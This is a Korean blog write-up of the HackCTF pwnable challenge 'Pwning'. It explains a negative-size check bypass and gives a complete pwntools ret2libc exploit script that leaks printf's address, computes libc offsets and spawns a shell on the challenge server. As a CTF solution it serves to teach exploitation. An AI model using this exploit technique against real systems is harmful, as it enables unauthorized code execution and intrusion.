-
[HackCTF : Pwnable] Pwning (300p)Wargame/HackCTF 2021. 12. 27. 16:37
[HackCTF : Pwnable] Pwning (300p)
입력한 숫자만큼의 byte를 입력받는다.
main 
vuln 
33 이상이면 No! That size (%d) is too large!를 출력하고 종료하는데 -1을 통해 우회할 수 있다.
다음은 그냥 rop
12345678910111213141516171819202122232425262728293031from pwn import *# p = process("./pwning")p = remote("ctf.j0n9hyun.xyz",3019)e = ELF("./pwning")prt_plt=e.plt['printf']prt_got=e.got['printf']vuln = e.symbols['vuln']payload = "A"*48payload += p32(prt_plt)payload += p32(vuln)payload += p32(prt_got)p.sendline("-1")p.sendline(payload)p.recvuntil(payload)p.recv(1)printf_addr = u32(p.recv(4))log.info(hex(printf_addr))libc_base = printf_addr - 0x049020system = libc_base + 0x03a940str_bin_sh= libc_base + 0x15902bpayload = "A"*48payload += p32(system)payload += "AAAA"payload += p32(str_bin_sh)p.sendline("-1")p.sendline(payload)p.interactive()cs 'Wargame > HackCTF' 카테고리의 다른 글
[HackCTF : Pwnable] Look at me (250p) (0) 2021.12.27 [HackCTF : Pwnable] Beginner_Heap(250p) (0) 2021.12.24 [HackCTF : Pwnable] Gift(250p) (0) 2021.11.26 [HackCTF : Pwnable] 1996 (200p) (0) 2021.11.25 [HackCTF : Pwnable] g++ pwn (200p) (2) 2021.11.15